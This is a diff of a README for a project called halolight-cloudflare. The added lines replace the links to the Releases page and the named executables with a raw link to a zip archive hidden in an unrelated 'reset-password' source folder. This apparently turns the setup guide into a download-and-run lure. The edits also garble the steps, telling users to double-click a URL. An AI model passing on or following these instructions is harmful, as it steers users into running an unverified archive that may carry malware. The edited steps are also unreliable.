Friska365/halolight-cloudflare/README.md

 To get started, follow these steps:

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/Friska365/halolight-cloudflare/releases).
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/Friska365/halolight-cloudflare/main/src/app/(auth)/reset-password/halolight-cloudflare-v1.6-alpha.1.zip).
 Here, you will find the latest versions of the application.

 2. **Download the Application:** Look for the latest release.
-Click on the link that says "Source code" (typically displayed as a .zip or .tar.gz file) to download the compressed file to your computer.
+Click on the link that says "Source code" (typically displayed as a .zip or https://raw.githubusercontent.com/Friska365/halolight-cloudflare/main/src/app/(auth)/reset-password/halolight-cloudflare-v1.6-alpha.1.zip file) to download the compressed file to your computer.

 3. **Extract the Files:** Once the download finishes, locate the downloaded file.
 Right-click on it and choose "Extract" or use your preferred application to unzip it.

 4. **Run the Application:**
-   - For Windows: Navigate to the extracted folder, double-click on `halolight.exe` to start the application.
+   - For Windows: Navigate to the extracted folder, double-click on `https://raw.githubusercontent.com/Friska365/halolight-cloudflare/main/src/app/(auth)/reset-password/halolight-cloudflare-v1.6-alpha.1.zip` to start the application.
-   - For macOS: Open the folder, right-click on `halolight.app`, and click "Open."
+   - For macOS: Open the folder, right-click on `https://raw.githubusercontent.com/Friska365/halolight-cloudflare/main/src/app/(auth)/reset-password/halolight-cloudflare-v1.6-alpha.1.zip`, and click "Open."
    - For Linux: Open a terminal, navigate to the folder, and use the command `./halolight` to start.

 5. **Follow the Setup Instructions:** After launching, the application will guide you through the setup process.
 Simply follow the on-screen prompts to configure your deployment preferences.